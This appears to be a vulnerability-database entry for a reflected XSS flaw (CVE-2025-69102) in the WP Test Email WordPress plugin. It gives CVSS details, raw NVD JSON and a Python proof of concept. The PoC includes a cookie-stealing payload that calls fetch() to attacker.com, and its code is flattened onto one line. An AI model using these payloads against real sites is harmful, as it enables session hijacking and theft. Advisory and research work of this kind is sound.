Security Vulnerability Report
中文
CVE-2025-69102 CVSS 7.1 HIGH

CVE-2025-69102

Published: 2026-01-22 17:16:23
Last Modified: 2026-04-15 00:35:42

Description

Improper Neutralization of Input During Web Page Generation ('Cross-site Scripting') vulnerability in Boopathi Rajan WP Test Email wp-test-email allows Reflected XSS.This issue affects WP Test Email: from n/a through <= 1.1.7.

CVSS Details

CVSS Score
7.1
Severity
HIGH
CVSS Vector
CVSS:3.1/AV:N/AC:L/PR:N/UI:R/S:C/C:L/I:L/A:L

Configurations (Affected Products)

No configuration data available.

WP Test Email plugin <= 1.1.7

PoC / Exploit Code

⚠ For Security Research Only
The following code is for security research and authorized testing only.
python
import requests from urllib.parse import quote # CVE-2025-69102 PoC - Reflected XSS in WP Test Email plugin # Target: WordPress site with WP Test Email plugin <= 1.1.7 target_url = "http://target-wordpress-site.com/" plugin_endpoint = "wp-admin/admin.php?page=wp-test-email" # Malicious XSS payload xss_payload = "<script>alert(document.cookie)</script>" # Alternative payload using img onerror event_payload = '<img src=x onerror=fetch("https://attacker.com/steal?c="+document.cookie)>' # Construct malicious URL malicious_url = target_url + plugin_endpoint + "&test_email=" + quote(xss_payload) print(f"[*] Target: {target_url}") print(f"[*] Plugin: WP Test Email <= 1.1.7") print(f"[*] Vulnerability: Reflected XSS") print(f"[*] Malicious URL:") print(malicious_url) # Send request to verify vulnerability (for authorized testing only) def check_vulnerability(url): try: response = requests.get(url, timeout=10) if xss_payload in response.text: print("[+] VULNERABLE: XSS payload found in response") return True else: print("[-] NOT VULNERABLE or payload not reflected") return False except requests.exceptions.RequestException as e: print(f"[!] Error: {e}") return False

References

Raw JSON Data

JSON
{"cve": {"id": "CVE-2025-69102", "sourceIdentifier": "[email protected]", "published": "2026-01-22T17:16:23.117", "lastModified": "2026-04-15T00:35:42.020", "vulnStatus": "Deferred", "cveTags": [], "descriptions": [{"lang": "en", "value": "Improper Neutralization of Input During Web Page Generation ('Cross-site Scripting') vulnerability in Boopathi Rajan WP Test Email wp-test-email allows Reflected XSS.This issue affects WP Test Email: from n/a through <= 1.1.7."}, {"lang": "es", "value": "Neutralización Incorrecta de la Entrada Durante la Generación de Páginas Web ('cross-site scripting') vulnerabilidad en Boopathi Rajan WP Test Email wp-test-email permite XSS Reflejado. Este problema afecta a WP Test Email: desde n/a hasta &lt;= 1.1.7."}], "metrics": {"cvssMetricV31": [{"source": "134c704f-9b21-4f2e-91b3-4a467353bcc0", "type": "Secondary", "cvssData": {"version": "3.1", "vectorString": "CVSS:3.1/AV:N/AC:L/PR:N/UI:R/S:C/C:L/I:L/A:L", "baseScore": 7.1, "baseSeverity": "HIGH", "attackVector": "NETWORK", "attackComplexity": "LOW", "privilegesRequired": "NONE", "userInteraction": "REQUIRED", "scope": "CHANGED", "confidentialityImpact": "LOW", "integrityImpact": "LOW", "availabilityImpact": "LOW"}, "exploitabilityScore": 2.8, "impactScore": 3.7}]}, "weaknesses": [{"source": "[email protected]", "type": "Secondary", "description": [{"lang": "en", "value": "CWE-79"}]}], "references": [{"url": "https://patchstack.com/database/Wordpress/Plugin/wp-test-email/vulnerability/wordpress-wp-test-email-plugin-1-1-7-reflected-cross-site-scripting-xss-vulnerability?_s_id=cve", "source": "[email protected]"}]}}